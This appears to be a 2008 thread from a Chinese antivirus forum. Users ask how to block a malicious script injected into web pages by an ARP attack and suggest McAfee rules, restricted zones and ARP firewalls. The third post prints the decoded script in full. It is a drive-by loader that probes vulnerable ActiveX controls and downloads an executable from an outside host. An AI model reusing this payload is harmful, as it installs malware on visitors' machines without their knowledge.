查看: 2643|回复: 4
收起左侧

[求助] 如何预防恶意HTTP对象 <http://g.asdafdgfgf.com/ads.js>

[复制链接]
sltht1
发表于 2008-1-29 11:42:35 | 显示全部楼层 |阅读模式
如何定义 8.5i规则预防HTTP对象 <http://g.asdafdgfgf.com/ads.js>呀!!!!
大猫熊
发表于 2008-1-29 11:53:31 | 显示全部楼层
呵呵~这个是ARP攻击以后在浏览网页里插入的~我家也有~8.5i对这个无能为力~用防火墙之类的可以挡,如果用IE上网的话,试试在internet选项里面的安全里面,受限站点,把它添加进去,如果不行就装一个ARP的防火墙吧!
深红的雪
发表于 2008-1-29 17:06:14 | 显示全部楼层
hxxp://g.asdafdgfgf.com/ads.js 解密后:
  1. if(document.cookie.indexOf('OKSUN')==-1){try{var e;var ado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='OKSUN=SUN;path=/;expires='+expires.toGMTString();document.write("<\/script>");if(e!="[object Error]"){document.write("<\/script>")}else{try{var f;var storm=new ActiveXObject("MPS.StormPlayer")}catch(f){};finally{if(f!="[object Error]"){document.write("<\/script>");document.write("")}}try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")}catch(g){};finally{if(g!="[object Error]"){document.write("<\/script>");document.write("")}}try{var h;var thunder=new ActiveXObject("DPClient.Vod")}catch(h){};finally{if(h!="[object Error]"){document.write("<\/script>");document.write("")}}try{var i;var yahoo=new ActiveXObject("GLCHAT.GLChatCtrl.1")}catch(i){};finally{if(i!="[object Error]"){document.write("")}}try{var j;var obj=new ActiveXObject("BaiduBar.Tool")}catch(j){};finally{if(j!="[object Error]"){obj.DloadDS("http://k.222360.com/ads/ads.cab","ads.exe",0);document.write("")}}if(f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"){document.write("")}}}}
复制代码
这个用我的规则包就能防住。

其实咖啡默认的设置和ScriptScan就能有不错的防护效果了
yuanliu 该用户已被删除
发表于 2008-1-30 16:55:06 | 显示全部楼层
通用规则包就有禁止HTTP通信的功能!不知道是否有效
大猫熊
发表于 2008-1-30 19:10:57 | 显示全部楼层
mcafee当然防得住,不用规则就用script scan都行,关键问题是如何不让恼人的警报框总是出现,这种被ARP攻击了的电脑上什么网都会显示警报,估计楼主所问的是这个问题。而且。。。。。楼主难道和我住一个小区?怎么连这种带毒的网址都是一样的?。。。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-29 08:30 , Processed in 0.126138 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表